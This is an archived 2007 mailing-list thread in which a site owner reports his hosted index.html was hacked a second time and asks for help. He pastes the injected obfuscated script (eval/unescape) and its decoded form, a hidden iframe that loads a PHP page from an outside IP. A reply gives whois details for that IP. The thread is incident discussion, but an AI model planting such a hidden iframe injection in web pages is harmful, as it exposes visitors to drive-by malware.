[ale] I've been hacked!

Adrin adrin at bellsouth.net
Wed Nov 21 18:33:42 EST 2007


 whois 69.73.146.142

OrgName:    Jaguar Technologies LLC 
OrgID:      JTL-8
Address:    4201 SW Freeway suite#216
City:       Houston
StateProv:  TX
PostalCode: 77027
Country:    US

NetRange:   69.73.128.0 - 69.73.191.255 
CIDR:       69.73.128.0/18 
NetName:    JAGUAR-TECHNOLOGIES-NOC
NetHandle:  NET-69-73-128-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Allocation
NameServer: NS.NOCDIRECT.COM
NameServer: NS2.NOCDIRECT.COM
Comment:    NOCDIRECT
RegDate:    2003-11-05
Updated:    2005-04-15

RAbuseHandle: ABUSE370-ARIN
RAbuseName:   Abuse 
RAbusePhone:  +1-713-960-1502
RAbuseEmail:  abuse at jaguarpc.com 

OrgTechHandle: GL538-ARIN
OrgTechName:   Landis, Greg 
OrgTechPhone:  +1-832-279-5529
OrgTechEmail:  greg at jaguarpc.com

# ARIN WHOIS database, last updated 2007-11-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

I seem to recall that IIS has/had a hosting bug of some type.  From what
I remember one virtual hosting domain could infect another on the same
server.  I wish I could remember were I read about it.  I remember
mostly that is was a RED HAT hosting site that had switch to M$ because
of SCO Lawyers.



On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> Last summer I received notification from Google that a web page on one 
> of my web hosting accounts was infected with some sort of malware bug. 
> 
> This account only has ftp access so I changed the password for the one 
> and only ftp account and removed the offending code from my index.html 
> file.  I also added a cron job to another site to compare a good 
> index.html with the one on the site that had been hacked in case they 
> came back.
> 
> They did.
> 
> Today I received a message that said the compare failed and found the 
> following at the top of the body in my index.html file:
> 
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
> </script>
> 
> That script, unescaped looks like:
> 
> window.status='Done';document.write('<iframe name=7b73 
> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
> width=351 height=133 style=\'display: none\'></iframe>'
> 
> Has anyone seen anything like this before?  I wonder what  sort of evil 
> function it might perform?
> 
> I also wonder how they got access the second time?  I went through the 
> cgi scripts on that system to be sure they were mine. There aren't any 
> php files on the system.
> 
> I attempted to look up the ip address but nslookup said it didn't exist, 
> however it pings and the index.html file from it is the default apache2 
> index file.  I suspect that system has been hacked as well.
> 
> Note the incident from last Summer was a different one.
> 
> Thanks,
> Jim.
> 
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale



More information about the Ale mailing list